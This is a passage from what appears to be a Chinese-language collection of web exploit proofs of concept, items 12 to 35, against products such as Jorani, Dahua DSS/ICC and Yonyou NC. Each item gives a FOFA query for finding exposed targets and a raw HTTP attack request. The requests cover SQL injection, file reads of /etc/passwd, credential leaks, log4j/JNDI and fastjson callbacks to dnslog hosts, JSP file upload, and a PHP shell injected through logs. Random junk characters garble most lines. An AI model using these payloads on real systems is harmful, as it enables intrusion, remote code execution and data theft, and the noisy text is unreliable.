/ }+ m4 t. R) ^+ v( ^) h4 k" Y+ yGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1! `, @) V0 y0 ~& ?
Host: 127.0.0.1! o( e. x- M+ T! F4 L
Pragma: no-cache/ B2 f2 N* w p! y n! k1 ^! z' C
Cache-Control: no-cache, _: d1 K; P2 Y
Upgrade-Insecure-Requests: 1
5 t: y$ Y! b, E2 G' P4 J! v, ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 n0 |* X8 B% }) e+ W3 q8 E- {4 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; X I9 j. o; _$ f5 p/ [( S6 s8 XAccept-Encoding: gzip, deflate3 `% K# N! T. X7 J4 S
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8+ w$ u8 F" P: D0 \2 D0 Z1 c
Connection: close
! X/ K/ P/ h, J6 f
/ i% H3 ]+ I1 \" |% z* n6 _' Y+ _% _
12. Jorani < 1.0.2 远程命令执行
n! a: L+ V; j$ tFOFA:title="Jorani"4 N0 C& ?: G4 |
第一步先拿到cookie
! d8 ]& Z: T6 F; Q8 `GET /session/login HTTP/1.18 ]/ x" k) F0 E; |
Host: 192.168.190.30
( `2 b" _, A6 I5 F3 wUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
n+ v/ ~8 c& l& d2 d2 PConnection: close
( J, a( v4 q, z4 }9 m VAccept-Encoding: gzip
. ?# O: ?* S4 y& a: `# _" s5 c( [- N8 r3 \. K
8 o6 h* T/ I8 R* r H! y9 A) D! `( M
响应中csrf_cookie_jorani用于后续请求
$ M" D; _' {6 f5 {3 S5 JHTTP/1.1 200 OK
: T! s2 F2 z! L+ G4 bConnection: close/ X. F. M" U5 @ X" ?5 _6 h
Cache-Control: no-store, no-cache, must-revalidate
b5 C8 ~# s: s: m: x% E' v) @; h) yContent-Type: text/html; charset=UTF-8
# Y1 {% C$ E$ R7 R3 R: WDate: Tue, 24 Oct 2023 09:34:28 GMT
* L& |" O( r" a( |8 sExpires: Thu, 19 Nov 1981 08:52:00 GMT; Y6 Z. [6 ~; F3 x
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
( G% _: l+ z6 L8 }9 {Pragma: no-cache
5 V2 @. t9 q. M: D+ J- F w; JServer: Apache/2.4.54 (Debian)
+ @ Y1 _+ m) L1 A) k v# NSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/: n' s, x$ U5 Y4 Y& z! C; ?: f% q3 T
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
5 h, r2 D; t% n7 v3 |- T6 }4 EVary: Accept-Encoding
4 s8 W8 k; j! W0 q$ i2 ?7 k- ~4 L$ N: b0 U1 @1 m- }( t
" _ [4 B, j- {$ M( n5 j
POST请求,执行函数并进行base64编码6 s/ W# L& G" L2 z
POST /session/login HTTP/1.1
( l9 i3 x9 i& y5 T' x, D! [Host: 192.168.190.30
5 h3 m" z( d8 V' ?% }4 W5 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
T$ D1 Q8 q3 G* LConnection: close2 z3 Z9 r/ q. S# g: s8 U+ G
Content-Length: 252
8 R2 N4 U Z2 jContent-Type: application/x-www-form-urlencoded' \" P& f, a- H3 f! z
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r2 A, a. k3 N: g; f1 V
Accept-Encoding: gzip9 x# _2 s6 c0 G0 |
# U/ x5 r# C: `6 I1 \csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
$ p+ k2 R6 @% c c) L1 k" ~
; q1 m1 o; I4 X9 c5 }8 S" E7 H2 w i ~3 B
- ?; P( z9 ] M0 d3 A向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
& y7 A! F( o, KGET /pages/view/log-2023-10-24 HTTP/1.18 p( R, P8 R$ _8 c1 c5 m
Host: 192.168.190.30
: X, U! w" @& \' A9 Q5 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- R7 [) r/ O) }Connection: close) {+ j: T. j, B4 P$ w
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r4 W2 r, ?) O* k0 S1 h
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
& y; J9 y" C# {0 L- {X-REQUESTED-WITH: XMLHttpRequest9 a7 j+ v! ]1 s D3 }' |( x, D
Accept-Encoding: gzip* Y! s- O: A! ]# A" N( H1 o" ~3 ?
% ]3 D P1 x4 T- s
5 H1 L6 ]0 d1 L `- n13. 红帆iOffice ioFileDown任意文件读取
8 V$ Z; j; L% B( B/ R3 M( OFOFA:app="红帆-ioffice"- K; T5 |9 T- l/ K
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1* U% c. B! Y! A
Host: x.x.x.x1 ]0 p3 I5 \! Q, m* W( [1 Z$ A2 i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.363 Q/ s5 U: J; X
Connection: close
( U- Y9 `5 O: b/ BAccept: */*0 z4 B& f' w8 |4 Z# |% L
Accept-Encoding: gzip
8 O; A8 o0 J5 Q; X& [! y% [9 Q6 v6 O- @( j8 i9 a+ N ?
, Y4 N- ^8 m1 m* E) U) y5 c
14. 华夏ERP(jshERP)敏感信息泄露; I# f* [0 [! A6 J5 N* `& G
FOFA:body="jshERP-boot"
0 f% Y7 t2 d p4 o- ^2 L/ o泄露内容包括用户名密码
) R" Q$ B. d* Z# d0 w8 r9 P# y& GGET /jshERP-boot/user/getAllList;.ico HTTP/1.1, A, \& [8 o$ k
Host: x.x.x.x
+ Y7 e _, i" Z, }" l9 g! RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
% i7 i) P: T a$ U* LConnection: close: E# \; c) s1 R: ]) f; k
Accept: */*( ~+ Y M8 p7 Z3 v7 C
Accept-Language: en
/ } f/ P# b2 m- l7 F) gAccept-Encoding: gzip A; i5 H" p0 P, H1 ]( k( h
0 w+ `6 W# h( \1 H( a2 g$ @: g
0 q1 ~9 s( N+ t* s% L15. 华夏ERP getAllList信息泄露8 m Z% r, K+ }- H* L/ `, g
CVE-2024-0490
) P" e) \+ R! P6 MFOFA:body="jshERP-boot"8 X$ ~5 ^0 r# X( M9 h1 `( q
泄露内容包括用户名密码
5 P9 `) R8 B2 e: W* H4 FGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
1 v9 B9 w- o; p- o2 f+ P: PHost: 192.168.40.130:100- f9 A* `7 ~/ q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.368 r. J% s! C% K
Connection: close
/ O+ q% A# {. @- xAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
. ^2 g* j l; p% f7 `Accept-Language: en
4 [# y) n' n( o$ asec-ch-ua-platform: Windows7 _" x( P7 W" q$ I% U# t
Accept-Encoding: gzip
3 |& }7 J( _0 t2 h% U" E
6 a8 D2 b% \7 z8 Y$ ~% S* E H
, R l: M& g9 B' L8 j' G16. 红帆HFOffice医微云SQL注入
2 r! n) N/ v P' j/ q1 p& ]FOFA:title="HFOffice") o. U: \' C7 n6 t: U
poc中调用函数计算1234的md5值! G% j e; b* W# _
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
8 w" b; O7 G7 K7 z" V5 hHost: x.x.x.x
3 n+ a% [! Z) WUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
, @# v8 U! `7 c. a( WConnection: close/ I9 N7 }/ ] J' @9 T* N
Accept: */** R2 v: k1 ]! F1 \
Accept-Language: en
3 k2 ?1 I X6 H$ S' O+ i% Z% EAccept-Encoding: gzip1 `4 \/ N$ @; m: |
1 I! l! v \; H p- ?: P
1 u; a+ z( G' r8 Q& D17. 大华 DSS itcBulletin SQL 注入7 p3 H4 a& N; ?0 ~4 J
FOFA:app="dahua-DSS"
7 q H Q4 k+ ^: A1 z. \POST /portal/services/itcBulletin?wsdl HTTP/1.1' u9 J! o$ z- n* t0 U6 ~9 F C; S& D
Host: x.x.x.x
3 W- k! C% ~2 m' U3 f* \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* H4 N" d+ w) u) F5 d$ J5 VConnection: close
7 G5 w1 |+ R5 M1 JContent-Length: 3453 S0 m8 ]6 i8 j1 h$ M0 N' N p
Accept-Encoding: gzip
7 c4 E) @# U* r. z9 s: j5 N) p/ [/ Q- k4 S7 d; a
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
0 s3 Y$ U( P5 i2 K8 E& E<s11:Body>6 V4 u( R- B0 O
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
1 g2 k( o5 F2 N5 o* W2 z, E <netMarkings>
& J) K! Y- R7 U" F (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=16 s. J R' ^. R% [6 L" n
</netMarkings>) e% V/ F0 Y% D+ |, b5 p5 {
</ns1:deleteBulletin>6 @3 d! x `9 |
</s11:Body>0 _8 @0 c' [- p$ V$ T
</s11:Envelope>& a5 \% U$ B; e7 X6 A
. Y4 w6 e* u/ p9 i f
! f; I$ k- J" ^
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露3 `8 \- S0 f1 ?* ^
FOFA:app="dahua-DSS"0 S% |# j- I& g+ |
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
9 X% e1 |) e4 F% g4 p# _Host: your-ip
" `* f; v3 K" }* W( @- P" `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( r, C/ ?+ b: a. F3 S. i0 q
Accept-Encoding: gzip, deflate
& l& Z4 J7 o* s$ RAccept: */*( G* @4 o3 p: D9 M) y' C) o
Connection: keep-alive0 ~, e( `9 N. i4 ^. T7 s
$ ]: G0 u4 h: z) [" J( R
* Q! k# _4 x. T9 L
, }8 A2 [1 a# Z j% @) t
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
3 J6 H" [4 H2 U7 GFOFA:app="dahua-DSS", d) U" G; A' E; }2 s! G
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1! }5 q, t5 `' J4 [
Host:, c7 P# D- @1 n
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- N/ N) f1 b- H9 [, ~ a* g" N3 wAccept-Encoding: gzip, deflate
. S9 [; C5 ]. u% ~ q2 f7 qAccept: */*
1 ?8 J$ q- u( \! i! Y }Connection: keep-alive4 E0 a* E8 O* [, S% x. `
2 R; q' ^& Z% \5 g7 U7 j
$ f8 n6 |1 G; ^: f# |20. 大华ICC智能物联综合管理平台任意文件读取' Q+ L" [3 h0 t
FOFA:body="*客户端会小于800*"
5 m$ E- _+ J; }1 j4 [4 TGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
/ Y5 H% J9 ~/ _/ j8 ^Host: x.x.x.x. x! e7 ~' u. U" { ~
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& U; |% R4 O! O) f' qConnection: close
7 T- n& g! W6 H* ZAccept: */*/ j/ ~* u' Q, f* _$ a' b; F
Accept-Language: en2 L5 j9 W) R" p+ O) U
Accept-Encoding: gzip
+ f/ B# n' ?1 i( B- o- e" b4 n% I8 P) ]4 \+ T& G
4 F" t1 f5 m; x6 ], i
21. 大华ICC智能物联综合管理平台random远程代码执行
/ A5 |( x# i, N4 U4 q# H) D' [FOFA:icon_hash="-1935899595"; K a E" ?1 T4 q
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1; k0 P s/ f) e! A0 M( N
Host: x.x.x.x
" e+ I$ j, e" Z9 A" MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' V& e) @3 F" V9 r% j6 i& H; {6 rContent-Length: 161
6 z, q& L9 k0 \6 l+ p; H6 ~Accept-Encoding: gzip
f, S. S Y( |! p& LConnection: close
6 x1 P# h% R/ A" y& LContent-Type: application/json;charset=utf-8
9 g' u; A8 _4 T7 s$ s8 Y- I0 w9 F* L/ F4 E' {
{* K9 p4 f3 A6 A$ n. C$ R' E% |) z
"a":{
8 N6 ~9 f- ?. ]+ A A "@type":"com.alibaba.fastjson.JSONObject",
+ C, N, t3 Z8 u2 g# W. O, z2 p {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
1 v8 A3 I3 u2 g3 @7 O: ^& w }""
5 \8 |' N( V& ?% O}
( A9 `2 g4 C2 s# k9 }' Q( P# ~1 f- u0 Y+ A3 ]
2 |; J }9 z1 \* f
22. 大华ICC智能物联综合管理平台 log4j远程代码执行# g, [( E e+ @, Q
FOFA:icon_hash="-1935899595"
, ?6 E5 Q) B! r' [" K% kPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.11 ~: d4 ]& L# E
Host: your-ip
\' G8 ]/ [: g0 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 Y# q2 { M* g7 ^: a7 y( NContent-Type: application/json;charset=utf-8
! c% [9 Q$ _& Z* ]; @+ A2 C& T% L1 ~5 o& n' c# E
{$ [" t6 B! b6 a& O( c% d+ |
"loginName":"${jndi:ldap://dnslog}"* d, K' r w! a/ L* Z0 q5 D$ D
}
1 n0 T+ X7 G) S6 o. f/ k Y3 A! t& s. W" i6 N0 w& I4 `1 u
+ D4 f$ `7 v$ \! R5 S# V8 [
9 o# A4 B0 z% h$ I. G/ }' A6 H
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行% N" C% Z: x0 C9 D, X0 G$ ~0 q/ r
FOFA:icon_hash="-1935899595"* i" G; k0 i1 O- Z
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1, o! W5 T3 ^/ x/ G C, z
Host: your-ip
; o; Y: K/ z+ W% g# VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% }6 [' x( ]4 q$ ^1 \' IContent-Type: application/json;charset=utf-8
) a% t- l+ T( \" f9 iAccept-Encoding: gzip
: D' a' Q0 y. A1 g$ [4 }Connection: close
. M4 g- X/ a: e6 l0 v( m" C# b7 L% L
{
+ z {- s0 k( d* P$ z5 h1 t "a":{1 F- p* z' I: [: p D$ S5 a7 G
"@type":"com.alibaba.fastjson.JSONObject",
- l& E0 j; i+ u4 @$ T8 v* |! p {"@type":"java.net.URL","val":"http://DNSLOG"}, z; B/ `! g2 W
}"". l% o* s7 I; H2 J
}7 h& w) o5 ]$ F7 |+ V! L
$ c( U1 V9 w& ^; j4 t( N3 s
) c2 I7 C, o) z! l24. 用友NC 6.5 accept.jsp任意文件上传2 J* e8 B# u1 p; ~: G& T( A& Q
FOFA:icon_hash="1085941792"
* m Z4 r' b" A0 r2 r# U5 KPOST /aim/equipmap/accept.jsp HTTP/1.1
* R6 |# N7 b. C6 DHost: x.x.x.x
3 m1 J3 S. ~' j% z+ G! d( AUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.362 Y, t' w9 ^. V9 z4 z t$ o
Connection: close# q( A& \& i- Q
Content-Length: 449
! e: ?1 r7 _, r, }5 h1 K4 PAccept: */*
7 F3 e |4 U& Z" E8 HAccept-Encoding: gzip$ D% D* q: e- v6 ?3 a4 ?" I
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
2 p, g3 {: p. g8 W7 U8 d
* V8 ~- a/ s4 h9 g-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: c/ Y9 y# h. \! N6 `; ?Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
- d' v Y$ K% j+ g6 TContent-Type: text/plain
" c. B7 M) M: f$ D
+ F# G% a, {" S! I<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
9 N; {( x0 ~$ D3 l' a+ L- l2 ^8 l-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' M; J7 Z/ z5 E: T. N& L# L% a! x7 Q
Content-Disposition: form-data; name="fname"
+ b' i% j2 C+ B! k. \
3 U' ?& ?5 S+ }3 l: y+ d5 b2 X\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
! P- o$ y: k# ~' i3 |/ n-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--9 `, e* [8 z$ ?$ @5 V: P7 |
) b: O( t( {( B' J" a; g: k. A
, G' h: i( l9 y25. 用友NC registerServlet JNDI 远程代码执行
) v0 f& I8 m& I6 W4 m; |+ kFOFA:app="用友-UFIDA-NC"# e P! y( {2 e, `+ T! f
POST /portal/registerServlet HTTP/1.1
+ n6 M& S8 F6 q! N9 H2 o8 S. DHost: your-ip. c. x. W) U: j9 @( Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.07 P( Q; g/ E5 N* K1 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.98 o$ ]' c7 }+ M1 y0 {) b' @
Accept-Encoding: gzip, deflate$ z2 y! T+ Z3 r4 H8 q
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6+ {8 E. s# ` X8 |/ M" E" T
Content-Type: application/x-www-form-urlencoded# l. g; A; ^4 o- Q4 b# y
% u" g4 r- e3 c0 q7 {% q" F
type=1&dsname=ldap://dnslog
2 @8 k; p: f$ m: s4 R; C, W# X3 T! h9 u& W
" I1 w7 B; R ?: K; _4 S2 X0 a
: @$ g& y1 z& H, N( F26. 用友NC linkVoucher SQL注入! q% Y1 T: ^1 M# E; W" R
FOFA:app="用友-UFIDA-NC"8 `0 k9 f, E9 A) K
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 f U K# q9 W: g" b7 j9 sHost: your-ip# v1 T* e$ O2 _9 @+ t: E7 [ f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 F, R8 h2 I0 [# l" GContent-Type: application/x-www-form-urlencoded6 n; i9 T' h1 h/ E: p4 Y
Accept-Encoding: gzip, deflate
, v, C' e' l- X# y4 uAccept: */*
|6 C S/ h2 tConnection: keep-alive* \3 c9 B, M$ s1 F7 T' D
& s! q2 p j+ u; b" E) B
) J e% y4 A/ W J, m
27. 用友 NC showcontent SQL注入% l6 v: O7 K9 [* Q2 k
FOFA:icon_hash="1085941792"9 G" v+ w7 @' s* L
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.12 y! ^2 v9 ~, k) Q, i2 _$ M
Host: your-ip
" }* t/ B7 y: kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; {. H( [6 l& o, R& G& kAccept-Encoding: identity
( W- d$ s6 ?3 Y3 h9 ^Connection: close
: Y5 T! v V* TContent-Type: text/xml; charset=utf-8
4 _5 Z# r. A) A9 C% `7 S2 A s0 T. |: B1 F: U @1 D7 W4 C
k6 \6 K% a5 s- d+ x# e( u2 ?" s
28. 用友NC grouptemplet 任意文件上传6 {! G* O2 r% \
FOFA:icon_hash="1085941792"
- D0 x8 c1 Z( h( C& S" Q# iPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
6 G( ~" L2 Q4 h5 c9 X; h0 mHost: x.x.x.x
4 R1 X4 Z5 ~& q& z7 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36$ }" |# B* e/ \
Connection: close8 B. A/ _$ T' u3 e( X) i1 P& m# ~
Content-Length: 268! @5 n" j6 q( m0 n: ?+ \
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
5 u" r. W/ w" [' C% H; n: OAccept-Encoding: gzip
3 H6 X3 |$ ~( F8 }3 l9 O0 i8 Q; i }; {: P) K! I L
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
5 A0 X2 O( }3 z4 A) sContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
. C3 [3 [# t$ l! F8 L$ Q: l) cContent-Type: application/octet-stream, a: e( R. I) p; U% B* n% |
$ \2 X6 h9 k! n) }' N. l<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>; g( T: V N n! G/ u+ k# d
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--4 c& `' F+ `# {2 _1 ?. {# J" c& j
8 w2 x2 J! s2 Q& @% c6 \' G3 E& x0 ~4 }
+ u8 j6 f& P8 x; @$ |/uapim/static/pages/nc/head.jsp
- V: w& O8 m$ |. x$ p+ |# Z! i6 G) l2 i
29. 用友NC down/bill SQL注入
" F, L$ t/ m' LFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' U0 q4 m) ^6 C& ]$ R# KGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
: n8 N6 G, k! `9 a& WHost: your-ip! s: h- a' x% B- H) G0 U- g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" K- W ]5 ]1 }1 E5 D0 R! V! u
Content-Type: application/x-www-form-urlencoded
7 I. s; R( @0 S h5 c9 tAccept-Encoding: gzip, deflate
' T; V. K% k, R) {% o9 U% lAccept: */*5 o5 i2 L1 j5 m* E, z/ A9 H
Connection: keep-alive) @+ n* y9 F$ M& O1 g5 L
+ H- b) P- x' f+ g1 P& A; ~* d, E; i
30. 用友NC importPml SQL注入: p& Z# [: }0 l5 Y* o
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"0 f) p: r4 n$ U1 E+ l
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.13 y% q+ }0 f( \. c6 }
Host: your-ip
( j+ h9 X9 j/ W/ T& e, g" vContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
0 T! L! ]( ~3 w' L4 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 k6 Q' _. K: Q3 J; H, P+ B+ OConnection: close! d' A* u$ k) \; Y/ H6 t9 g
9 b/ ~) F1 D) c, M6 |( M& k: g( T
------WebKitFormBoundaryH970hbttBhoCyj9V" i, ? u0 K. E+ n d# Y6 a* E
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"0 ?7 x# C# X( m
Content-Type: image/jpeg# v3 R( m8 u0 y; p Q
------WebKitFormBoundaryH970hbttBhoCyj9V--
2 P; g* l9 y x6 a. g4 L8 U
. I' e4 ]0 J& o! d# P5 O" t! e& s, F/ k3 R2 `* w
31. 用友NC runStateServlet SQL注入
. }1 W+ q8 ?7 b) I4 Qversion<=6.56 b) D& A: Y! }5 E
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"; g' y; e. A) l, o/ @- \
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. Z" i0 t- \4 x! p1 `0 N, a$ w/ Y; T* @Host: host+ k0 W+ z+ V a8 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$ q' ?% E% b4 e+ H: l4 N
Content-Type: application/x-www-form-urlencoded
6 ~6 Y) @4 u$ U5 ?( {7 L7 M' {+ @" P. r6 u1 W7 C
/ \/ H2 O, g! z4 w& J" c8 h
32. 用友NC complainbilldetail SQL注入
% ?; _7 q% Q4 C, B& T$ O/ dversion= NC633、NC65
/ ^; j) B2 I1 d L1 R$ h+ qFOFA:app="用友-UFIDA-NC"+ u9 i! g7 W2 r: S6 _
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, e# f9 n# z+ `% y$ ~# QHost: your-ip
' c! q! y: b, jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ s- d+ } d- M! o
Content-Type: application/x-www-form-urlencoded# u) e1 p3 ~9 X: x9 Z
Accept-Encoding: gzip, deflate
9 a+ c$ \4 u! JAccept: */*
# y" n. t: M( r% X: \ \Connection: keep-alive
9 T8 O; Q+ a3 |5 l3 D# B2 T& D6 O' R( v" [6 u* _' t. w2 e
* ~- t: Z6 j- e* {# g2 y- u
33. 用友NC downTax/download SQL注入
- d, W$ S# o5 u6 u H% R, Bversion:NC6.5FOFA:app="用友-UFIDA-NC"
& V) d/ H1 t: [: AGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1- ^1 P# R- @- R0 X" G' ]
Host: your-ip7 W1 v$ X ^' e: Q8 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ T0 W% Q. C8 g5 Q" _Content-Type: application/x-www-form-urlencoded
* y8 T, k7 K. {Accept-Encoding: gzip, deflate' `! F5 r* ~5 z7 h9 z
Accept: */*& q( \0 Y/ u+ u% B9 K; G
Connection: keep-alive+ n) w9 p: K' j# l5 K- ^
. r1 K, O0 Q/ j% r- @% Z# u
! Z2 S( W+ ~: V+ H$ i( F' G34. 用友NC warningDetailInfo接口SQL注入. L1 S6 d& F- {% \! a
FOFA:app="用友-UFIDA-NC"/ F/ d2 o; a/ N2 L( z( p
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.13 [+ f$ F/ |( w* D9 g0 K6 B
Host: your-ip
/ f9 E3 @. n3 m- Q9 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ O3 p% S' P" L- K7 v. S; rContent-Type: application/x-www-form-urlencoded/ S) h0 r; A; L0 E* W
Accept-Encoding: gzip, deflate0 b6 R& l) m- I* m
Accept: */*
1 `- [+ u0 j, }0 ]* x [5 r( f. IConnection: keep-alive7 v/ x# Z% j P' ]* T( u* {/ S
. r/ S' F1 ?! b9 X2 I% c
9 _, j$ i! s9 X8 S35. 用友NC-Cloud importhttpscer任意文件上传, Q; C! [' I x) w& _) R
FOFA:app="用友-NC-Cloud"
